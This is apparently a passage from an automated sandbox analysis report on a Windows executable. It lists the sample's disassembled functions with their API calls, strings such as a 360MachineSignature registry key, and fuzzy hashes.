GdipDeleteBrush.GDIPLUS(?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000), ref: 0042A4A2
GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?), ref: 0042A4AB
GdipDeleteFont.GDIPLUS(?,00000000,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF), ref: 0042A4B4
SelectObject.GDI32(00000000,?), ref: 0042A4C1
GdipDeleteFontFamily.GDIPLUS(?), ref: 0042A4CB
GdipDeleteGraphics.GDIPLUS(?,?), ref: 0042A4D4
DeleteObject.GDI32(?), ref: 0042A4E1
DeleteDC.GDI32(00000000), ref: 0042A4EC

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$Delete$Create$FontObject$BrushCompatibleFillFormatSelectString$BitmapFamilyFromGraphicsHeightHintPixelRectangleRenderingSolidText
String ID:
API String ID: 2633235991-0
Opcode ID: a097ecd49909bb08ad003b2c23f3e470d2e756214d58951aae84d30e78e4d7e4
Instruction ID: 4e80d2d929e380933f70dbde1135d6243de09a489c9987241f35bfaf6d66798b
Opcode Fuzzy Hash: a097ecd49909bb08ad003b2c23f3e470d2e756214d58951aae84d30e78e4d7e4
Instruction Fuzzy Hash: 77818071A00219EFCB10EFA5DC84AEEBBB8FF45314F11811EF914A7241D778A945CBA9

Function 00445510 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 244stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000), ref: 00445547
CoTaskMemFree.OLE32(00000000,?,?,00000000,00000000), ref: 0044555F
CharNextW.USER32(?,00000000,00000000), ref: 004455D1
CharNextW.USER32(00000000,?,00000000,00000000), ref: 004455D6
CharNextW.USER32(00000000,?,00000000,00000000), ref: 004455DB
CharNextW.USER32(00000000,?,00000000,00000000), ref: 004455E0
CharNextW.USER32(00000000,?,?,00000000,00000000), ref: 0044569B
CoTaskMemFree.OLE32(?,00000000,?,?,00000000,00000000), ref: 004456C6

Strings

}}, xrefs: 00445678
HKCR, xrefs: 004455B2
HKCU{Software{Classes, xrefs: 004455E8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$FreeTask$lstrlen
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 3737899670-1142484189
Opcode ID: 5bc3ca46404d1944c14b25186623de5910e7ad3ae8f01d839fdf136b59438c6f
Instruction ID: 127d6e1aee6a55e64da986a7af84bd35408c2a4dcf7e56f57e958ef5195e5d04
Opcode Fuzzy Hash: 5bc3ca46404d1944c14b25186623de5910e7ad3ae8f01d839fdf136b59438c6f
Instruction Fuzzy Hash: 2E81A271A006188FEF20DBA9C88479EB7F8EF05314F95406BE909DB346DB789C45CB59

Function 00440790 Relevance: 25.8, APIs: 17, Instructions: 329COMMON

Download Yara Rule

APIs

RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004407EC
IsWindow.USER32(?), ref: 004407FB
GetSysColor.USER32(00000005), ref: 0044083B
GetWindowLongW.USER32(?,000000F0), ref: 004408EB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$ColorLongRedraw
String ID:
API String ID: 4056730343-0
Opcode ID: ca1abdbc874770277728bbe36bf4a117513bd8c364929f1d7c7642bff420dd03
Instruction ID: 98fc8f41d6d163022ece6be5d9d68c41223d0c7f9aca896b60a9b6a68b633fc1
Opcode Fuzzy Hash: ca1abdbc874770277728bbe36bf4a117513bd8c364929f1d7c7642bff420dd03
Instruction Fuzzy Hash: E4C19D742042029FE710DF59C884B6B77E9EF88714F14852EFA449B3A1CB38EC55CBA9

Function 0043E980 Relevance: 25.7, APIs: 17, Instructions: 237commemoryCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0043E9E7
GetWindowLongW.USER32(?,000000EC), ref: 0043E9F7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 0043EA02
GetWindowLongW.USER32(?,000000EB), ref: 0043EA10
OleUninitialize.OLE32 ref: 0043EA22
OleInitialize.OLE32(00000000), ref: 0043EA2F
GetWindowTextLengthW.USER32(?), ref: 0043EA36
GetWindowTextW.USER32(?,00000000,00000001), ref: 0043EA93
SetWindowTextW.USER32(?,004BCD08), ref: 0043EA9F
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0043EAC8
GlobalLock.KERNEL32(00000000), ref: 0043EAD5
_memcpy_s.LIBCMT ref: 0043EAE7
GlobalUnlock.KERNEL32(00000000), ref: 0043EAF0
CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 0043EAFD
DefWindowProcW.USER32(?,?,?,?), ref: 0043EBF9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$GlobalLong$Text$AllocCreateInitializeLengthLockProcStreamUninitializeUnlock_memcpy_s
String ID:
API String ID: 2032182138-0
Opcode ID: c61d0fddc6ab4fcec40ef0815219ec5960cc77f8ce0d751a65aeea9c773c103f
Instruction ID: c0f04b444a69283280af9de96a8451d22a1e08eb451a14ff96d4003cf6866933
Opcode Fuzzy Hash: c61d0fddc6ab4fcec40ef0815219ec5960cc77f8ce0d751a65aeea9c773c103f
Instruction Fuzzy Hash: 2C816C71901215AFDB11EF69CC45FAFBBB8AF48310F14465AF502A7291DB38AD01CBA9

Function 00464950 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 156windowthreadCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Q360PromoClass,00000000), ref: 00464972
PostMessageW.USER32(00000000,00000010,00000000,00000040), ref: 0046497F
ShowWindow.USER32(?,00000000), ref: 0046498E
SetEvent.KERNEL32(?), ref: 004649AA
CloseHandle.KERNEL32(?), ref: 004649B3
SetEvent.KERNEL32(?), ref: 004649C9
CloseHandle.KERNEL32(?), ref: 004649D2
GetCurrentThreadId.KERNEL32 ref: 00464A73
EnterCriticalSection.KERNEL32(?), ref: 00464A85
LeaveCriticalSection.KERNEL32(?), ref: 00464ACE
PostQuitMessage.USER32(00000000), ref: 00464AF9
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00464B15

Strings

Q360PromoClass, xrefs: 00464963
Q360PromoClassLow, xrefs: 0046496A, 00464971

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCriticalEventHandleMessagePostSectionWindow$CurrentEnterExceptionFindLeaveQuitRaiseShowThread
String ID: Q360PromoClass$Q360PromoClassLow
API String ID: 1959851942-3614897671
Opcode ID: 1ef698cecd03d82646469f03171d86888c3e6871567659796a289cba438008e2
Instruction ID: 56d757dafd0a474b3a4655ae57a73f5c183d514a9328f596b2a00afd5098ce85
Opcode Fuzzy Hash: 1ef698cecd03d82646469f03171d86888c3e6871567659796a289cba438008e2
Instruction Fuzzy Hash: E2519475600300AFDB10DF65DC84B5773A9BF88714F144A2EED459B392EB38E801CBA9

Function 0043D2B0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 112libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(004E6D48), ref: 0043D301
_memset.LIBCMT ref: 0043D319
SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,CurrentVersion,?,?,?), ref: 0043D34A
GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion), ref: 0043D3F3
GetProcAddress.KERNEL32(00000000), ref: 0043D3FA

Strings

CurrentVersion, xrefs: 0043D32D
@, xrefs: 0043D343
RtlGetVersion, xrefs: 0043D3DF
HmN, xrefs: 0043D2D4
ntdll.dll, xrefs: 0043D3E4
HmN, xrefs: 0043D3C1
HmN, xrefs: 0043D414
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0043D332

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProcValueVersion_memset
String ID: @$CurrentVersion$HmN$HmN$HmN$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 3272816113-3379719256
Opcode ID: df6ae1e60f43092830985dc560ce365f47772e4566f5586fb4856dd9bf24dad3
Instruction ID: 9bf1dedacae6c9e5aa836df23d8f206734da25c20dfe9d67ed79a34aede763d0
Opcode Fuzzy Hash: df6ae1e60f43092830985dc560ce365f47772e4566f5586fb4856dd9bf24dad3
Instruction Fuzzy Hash: CD41E2B0F002888BCB14DF69AC81B9E37A5AB68791F51403FE9059F692DB799C05CB1D

Function 0042E660 Relevance: 24.2, APIs: 16, Instructions: 211memorywindowCOMMON

Download Yara Rule

APIs

GdipGetImageWidth.GDIPLUS(?,?), ref: 0042E686
GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 0042E69D
GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 0042E6E5
GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E70F
GdipAlloc.GDIPLUS(00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E722
GdipGetImageGraphicsContext.GDIPLUS(?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E740
GdipSetPixelOffsetMode.GDIPLUS(00000000,00000002,?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042E752
GdipSetSmoothingMode.GDIPLUS(?,00000004,00000000,00000002,?,?,00000008,?,?,00000000,0026200A,00000000,?,00000010,?,?), ref: 0042E763

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$Image$AllocMode$BitmapContextCreateFromGraphicsHeightOffsetPixelScan0SmoothingWidth
String ID:
API String ID: 3931329870-0
Opcode ID: bf41e37deee3c6a791cd34d9b4c0ec6da0c23dac44a51bc07fc3790bb794bcc5
Instruction ID: f30007c343395d4d28bcef7463d0b73f766beae805a266994da5c3ec7389f55b
Opcode Fuzzy Hash: bf41e37deee3c6a791cd34d9b4c0ec6da0c23dac44a51bc07fc3790bb794bcc5
Instruction Fuzzy Hash: 6B7140B0A0020AEFDB10DFA6D985AAFBBF8EF44744F10895EE959E7240E734DD418B54

Function 0047A2F0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 114memorysynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(C1DE166F,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A336

Part of subcall function 0047A070: _vswprintf_s.LIBCMT ref: 0047A09A

CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A36B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A37E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A38E
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A3AC
HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,004AD4FB,000000FF), ref: 0047A3BD
__CxxThrowException@8.LIBCMT ref: 0047A3F7
__CxxThrowException@8.LIBCMT ref: 0047A421
ReleaseMutex.KERNEL32(00000000), ref: 0047A439
CloseHandle.KERNEL32(00000000), ref: 0047A444

Strings

1830B7BD-F7A3-4c4d-989B-C004DE465EDE, xrefs: 0047A33D
(bN, xrefs: 0047A44A
%s %u, xrefs: 0047A342

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8HeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vswprintf_s
String ID: %s %u$(bN$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
API String ID: 3526415198-3071653440
Opcode ID: 0d8cee2153334fb997b04acabb6204f53038666f2265861be4062519cb960c75
Instruction ID: e194817bf2e7d16d4174f96520751dd94e0059aed73972de63d2eca86cb6f0f9
Opcode Fuzzy Hash: 0d8cee2153334fb997b04acabb6204f53038666f2265861be4062519cb960c75
Instruction Fuzzy Hash: 8E41D7719002449FCB10EFA4DC85BEE77B8EB44714F10863EE909A7291DB7D49498B5A

Function 00474900 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\360MachineSignature,00000000,00020119,?,00000000,004BE8F0,00000000,?,?,?,00474D3E,?,?), ref: 00474926
RegQueryValueExW.ADVAPI32(?,Operator,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 0047496D
RegQueryValueExW.ADVAPI32(?,IssueDate,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 004749B4
RegQueryValueExW.ADVAPI32(?,ExpirationDate,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 004749F3
RegQueryValueExW.ADVAPI32(?,SignData,00000000,?,00000000,?,?,?,00474D3E,?,?), ref: 00474A2A
RegCloseKey.ADVAPI32(?), ref: 00474A68
RegCloseKey.ADVAPI32(?,?,?,00474D3E,?,?), ref: 00474A81

Strings

IssueDate, xrefs: 004749AA
SignData, xrefs: 00474A20
ExpirationDate, xrefs: 004749E9
Operator, xrefs: 0047495E
SOFTWARE\360MachineSignature, xrefs: 00474916

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: QueryValue$Close$Open
String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
API String ID: 2895014784-1479031278
Opcode ID: c692cba51cfd2066502bd6aa15758e4fc88e9a17b99816016dcb8874bc330d81
Instruction ID: 8bcaa0cccb2167316de61ac67ccb373c22614a393bd1e79f74d8290c9f3a834f
Opcode Fuzzy Hash: c692cba51cfd2066502bd6aa15758e4fc88e9a17b99816016dcb8874bc330d81
Instruction Fuzzy Hash: 015146B16443029FD320CF58D881A7BB7E8EBD8790F05492EF599D3210E734E909CB59

Function 00443490 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 138comCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 004434F0
GetStockObject.GDI32(0000000D), ref: 004434F8
GetObjectW.GDI32(00000000,0000005C,?), ref: 00443509
GetDC.USER32(?), ref: 0044355F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044356E
ReleaseDC.USER32(00000000), ref: 004435C9
OleCreateFontIndirect.OLEAUT32(00000020,004C1B8C,?), ref: 004435F8

Strings

, xrefs: 0044353B

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$Stock$CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 2212500748-3916222277
Opcode ID: d5cef1ceceed173422871563671e80e2d58b30cd8f3a770f911985e5a84692a6
Instruction ID: 512a22194f60dd1ddd1e3a52b632174e382504845dac6edba1a5397ecd5c7bed
Opcode Fuzzy Hash: d5cef1ceceed173422871563671e80e2d58b30cd8f3a770f911985e5a84692a6
Instruction Fuzzy Hash: 2C519F71A003199FDB20EFA9D844B9EFBF8AF18741F14416AE805EB350DB349A05CF58

Function 0042A660 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 374memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(0000000C,?,?,?), ref: 0042A70D
GdipPrivateAddMemoryFont.GDIPLUS(?,?,?,0000000C,?,?,?), ref: 0042A739
GdipAlloc.GDIPLUS(0000000C,?), ref: 0042A898
GdipPrivateAddMemoryFont.GDIPLUS(?,?,?,0000000C,?), ref: 0042A8BF

Strings

T9N, xrefs: 0042A770
theme_attrib, xrefs: 0042A9E2
common, xrefs: 0042A809
IDI_ICON_FONT, xrefs: 0042A691
default, xrefs: 0042A829
.ttf, xrefs: 0042A789
_EXT.ttf, xrefs: 0042A7E3

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$AllocFontMemoryPrivate
String ID: .ttf$IDI_ICON_FONT$T9N$_EXT.ttf$common$default$theme_attrib
API String ID: 1909619073-1496135245
Opcode ID: dc20e6d1cb3d2915656a07cb2ff724f24a9c5b6b6e90b6d05837ea874cd156d6
Instruction ID: 2ff41819fe04ce0788ad32e2a70418eca4de3f8adaeef7079eae5f51084d470c
Opcode Fuzzy Hash: dc20e6d1cb3d2915656a07cb2ff724f24a9c5b6b6e90b6d05837ea874cd156d6
Instruction Fuzzy Hash: 1EE14371E00204DFCB04DFA9E881A9EB7B4EF44314F54826EE915AB391CB38AD45CB99

Function 00448790 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 223synchronizationfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004487F9

Part of subcall function 0048DE2F: __getptd.LIBCMT ref: 0048DE34

_memset.LIBCMT ref: 0044881B
_wcsncpy.LIBCMT ref: 00448830
PathRemoveFileSpecW.SHLWAPI(?), ref: 0044883F
WaitForSingleObject.KERNEL32(?,00000000), ref: 00448872
WaitForSingleObject.KERNEL32(?,00000000), ref: 0044888B
_rand.LIBCMT ref: 004488BE
MoveFileW.KERNEL32(?,?), ref: 00448932
GetLastError.KERNEL32 ref: 0044893C

Strings

T9N, xrefs: 004488AA
%s\%d, xrefs: 004488CB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileObjectSingleWait$CountErrorLastMovePathRemoveSpecTick__getptd_memset_rand_wcsncpy
String ID: %s\%d$T9N
API String ID: 1256354863-135519442
Opcode ID: 7bdaf92e14242d6473d0d61d22f2a9b02c7b65391cf784a57d49b28f2730a22b
Instruction ID: 00aa38c6076ddc401274eeeea048ddfd2baf4b4b3fab62e7f4c05b26532d5765
Opcode Fuzzy Hash: 7bdaf92e14242d6473d0d61d22f2a9b02c7b65391cf784a57d49b28f2730a22b
Instruction Fuzzy Hash: 9A8190B1A006059FD710DF68CC85AAEB3B5FF49324F2487AEE019DB2A1DB349E45CB54

